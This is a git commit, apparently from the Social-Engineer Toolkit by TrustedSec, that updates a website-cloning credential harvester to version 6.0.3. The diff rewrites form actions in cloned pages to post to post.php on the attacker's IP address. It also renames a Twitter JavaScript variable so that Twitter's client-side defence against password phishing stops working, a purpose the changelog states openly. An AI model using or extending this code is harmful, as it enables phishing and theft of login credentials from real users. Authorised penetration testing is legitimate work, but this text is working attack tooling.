Updated to remove website restrictions

This commit is contained in:
TrustedSec 2014-06-12 13:44:01 -04:00
parent d46c3266cc
commit 57f86c00e0
3 changed files with 12 additions and 1 deletions

View file

@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 6.0.3
~~~~~~~~~~~~~~~~
* added a check in for twitter logins - they are doing client-side validation if root isn't twitter.com - added a rename on function variables to get around the password field not being allowed to be entered
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~

View file

@ -230,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.0.2'
define_version = '6.0.3'
return define_version
class create_menu:

View file

@ -81,6 +81,11 @@ for line in fileopen:
line = re.sub('action="*"', 'action="http://%s/post.php"' % (ipaddr), line)
# this is if twitter is in use, we rename a function name to something garbage to remove password phishing restrictions
match2 = re.search("swiftActionQueue={buckets:j", line, flags=re.IGNORECASE)
if match2:
# garble the buckets name, causes password to not be jacked
line = line.replace("swiftActionQueue={buckets:j", "swiftActionQueue={3buckets:j")
filewrite.write(line)